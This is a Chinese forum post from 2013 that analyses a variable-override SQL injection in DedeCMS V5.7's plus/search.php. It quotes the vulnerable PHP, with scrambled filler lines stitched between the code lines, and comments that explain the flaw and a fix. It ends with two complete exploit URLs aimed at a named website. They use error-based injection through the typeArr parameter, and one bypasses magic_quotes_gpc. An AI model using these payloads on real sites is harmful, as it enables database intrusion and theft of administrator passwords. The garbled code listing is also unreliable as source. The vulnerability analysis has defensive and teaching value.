标题:
DedeCms V57 plus/search.php文件SQL注射
作者:
admin
时间:
2013-1-19 08:18
标题:
DedeCms V57 plus/search.php文件SQL注射
在微博上看到就分析了一下。这个漏洞不止一处地方可以被利用，而且其中一处在 magic_quotes_gpc = On 的时候也能利用，真心不鸡肋。
作者:
c4rp3nt3r@0x50sec.org
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
黑哥说漏洞已补，怪我没有测试好，也没用这个黑站……不过这个漏洞真心不错，应该有一定利用价值。标题就不改了，既然补了就公开吧。
============
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
// Excerpt of plus/search.php as quoted in the post. Request parameters are used
// as plain globals here; the author attributes that to DedeCMS's global-variable
// registration, which is not shown in this excerpt.
// (the <font> tags below are forum highlighting, not part of the PHP source)
require_once(dirname(__FILE__).”/../include/common.inc.php”);
+ |) s% H' [. D+ s% z# o, D
require_once(DEDEINC.”/arc.searchview.class.php”);
: [' w6 e, Y; {+ T/ V4 P5 ^& n, U
1 E8 _: h8 j4 m/ U- U$ b
// Numeric parameters: each is kept only when it is set and passes is_numeric(),
// otherwise it falls back to a default.
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
3 q- I3 e& N4 y& T. S
// This is the only validation $typeid receives; it is reassigned again further
// down (inside the $typeArr loop) without any re-check.
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
" b* a" u4 k( m2 T G; K& B2 c: i
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
) x/ C; q0 F% W+ ?0 h
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
1 X- j7 p+ y$ t: j/ y, j
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
- \! n" D) C/ n. d. M
0 F; w. k; M# A' _; T+ C, M8 y
// $orderby / $searchtype are reduced to ASCII letters only (case-insensitive).
if(!isset($orderby)) $orderby=”;
+ P' {; X" }$ i8 a
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
( A1 Q% O9 I1 I3 u" D, ~! T+ K' x: V: ^
! _( ~7 [5 e( k# @: n# f
1 |0 x" e' {" [# L4 ?
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
, {# h0 H' D- c9 M/ d8 w
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
. ~' U0 I# r+ Y0 I- [8 q0 S1 ]
3 v% M {7 h, K
// $keyword defaults to the $q parameter when not supplied directly.
if(!isset($keyword)){
# i, R9 v7 d5 T; _! N* B
if(!isset($q)) $q = ”;
) ?4 D5 s, O* `+ l, W& a1 C7 | u
$keyword=$q;
( a N5 F0 q2 E
}
) ~% K! x" f3 }( F9 A& g* V
+ P! j! t& a0 H+ B
// FilterSearch() is defined elsewhere in DedeCMS; what it strips is not visible here.
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
6 M* l1 {2 O1 p% m
P/ B3 `- S) v0 Z+ ~! V
// look up category (column) information
- p& P/ d0 L9 ^8 F+ I
// Only runs when no (numeric, non-zero) $typeid was given — i.e. exactly the
// case where the caller did not pass the numeric check above.
if(empty($typeid))
: d) t! X! L& s- X$ V+ G' I
{
' p, e1 k1 ^, h2 I1 t8 A7 x
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
$ c7 z' h3 q) k% e. F( U
// Regenerate the cache when it is missing or older than 24 hours.
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
' k3 z- m2 e, L# j/ [
{
9 ]3 f) Q" p y9 v+ l$ c
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
- [1 ?$ d- A9 S7 b9 J+ [: p7 H8 R' G
fwrite($fp, “<”.”?php\r\n”);
/ I' U% @! w, U+ o+ u& v
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
# R% t2 T/ \3 A& t4 n9 N8 o
$dsql->Execute();
1 _! w. s7 ^( N3 m* @3 z1 g
while($row = $dsql->GetArray())
- f: O* t3 ?3 ]6 O# o! \
{
( u3 z! n7 l3 X4 T9 \
// The cache is a PHP file assigning $typeArr[id] = 'typename'; typename is
// written verbatim (no escaping is visible in this excerpt).
fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
: v- [, N* M* s% m# I' u- d9 r
}
- i. a. `/ {% s! a g/ s9 A& j
fwrite($fp, ‘?’.'>’);
# z* p& k: e8 b# u- F! ?
fclose($fp);
& N C7 ^$ G. t( Y; g6 Q
}
5 f4 O1 r* K% }$ ^8 g
// include the category cache and check whether the keyword mentions a category
# M, v V5 V, O' M3 w/ i
require_once($typenameCacheFile);
/ Y8 b1 O" v! H$ x
// $typeArr is normally defined inside the generated temp file included above; because of
// DedeCMS's global-variable mechanism (the author's claim) the requester can define one too
1 g9 n1 h" s$ R
//
" a0 B- m. w1 t! P1 T; M5 b0 w$ v
// Nothing here checks where $typeArr came from: any array value is accepted.
if(isset($typeArr) && is_array($typeArr))
. ^9 a8 E) C3 _. s- A! @
{
1 B- o7 u* A2 [% F- Q) ~
// Both the key ($id) and the value ($typename) are taken from $typeArr as-is.
foreach($typeArr as $id=>$typename)
# c1 w/ g; Y& Q! T5 i! N+ t; f
{
5 S! ]1 Q4 u" l, C
# J' J: e# |* B# ]1 h1 ^
// The branch below is entered whenever $typename occurs anywhere in $keyword.
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> // this is the spot that needs to be bypassed
& K2 e" F6 E, D6 P" T3 E
if($keyword != $keywordn)
( a3 e4 m+ Z. A
{
, H" \2 e8 i6 o; B
$keyword = $keywordn;
% i) k5 K N% r0 H1 i. e) q! E( Q
// Fix: take the key as an integer, e.g. (int)$id, or re-validate $typeid with
// is_numeric() after this loop before it is handed to TypeLink / SQL.
<font color=”Red”>$typeid = $id; </font>// variable-override vulnerability: this assignment turns the earlier "$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;" filter into a no-op
/ B7 i/ k6 L( P2 Z# u! L4 L
break;
6 z6 D" ?; r: P6 Z3 H5 K, J
}
7 @/ w! F( r4 L9 C% U3 i* I
}
z% K* r% b6 B6 n7 D' O1 c
}
; b) Z; ? v! T
}
然后 plus/search.php 文件下面创建了一个 Search 类的对象。
在 arc.searchview.class.php 文件中，SearchView 类的构造函数里又创建了一个 TypeLink 类的对象：
$this->TypeLink = new TypeLink($typeid);
TypeLink 类的构造函数没有再做过滤（程序员以为前面已经过滤过了……），直接把 $typeid 带入了 SQL 语句。
class TypeLink
{
var $typeDir;
var $dsql;
var $TypeID;
var $baseDir;
var $modDir;
var $indexUrl;
var $indexName;
var $TypeInfos;
var $SplitSymbol;
var $valuePosition;
var $valuePositionName;
var $OptionArrayList;//构造函数///////
//php5构造函数
function __construct($typeid)
{
$this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
$this->indexName = $GLOBALS['cfg_indexname'];
$this->baseDir = $GLOBALS['cfg_basedir'];
$this->modDir = $GLOBALS['cfg_templets_dir'];
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
$this->dsql = $GLOBALS['dsql'];
$this->TypeID = $typeid;
$this->valuePosition = ”;
$this->valuePositionName = ”;
$this->typeDir = ”;
$this->OptionArrayList = ”;
//载入类目信息
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
`#@__channeltype` ch
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
if($typeid > 0)
{
$this->TypeInfos = $this->dsql->GetOne($query);
利用代码一：需要 magic_quotes_gpc = Off。
www.political-security.com
/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
这只是其中一个利用点……再看 Search 类的构造函数往下的代码：
……省略
$this->TypeID = $typeid;
……省略
if($this->TypeID==”0″){
$this->ChannelTypeid=1;
}else{
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
//现在不鸡肋了吧亲…
$this->ChannelTypeid=$row['channeltype'];
}
利用代码二：下面这个 EXP 即使 magic_quotes_gpc = On 也可以成功利用。
www.political-security.com
/plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
如果那个数据库里已经存在内容，就要考虑得复杂一点了。我也没考虑那么周全，只是分析了一下然后简单测试了一下，也没用来黑站。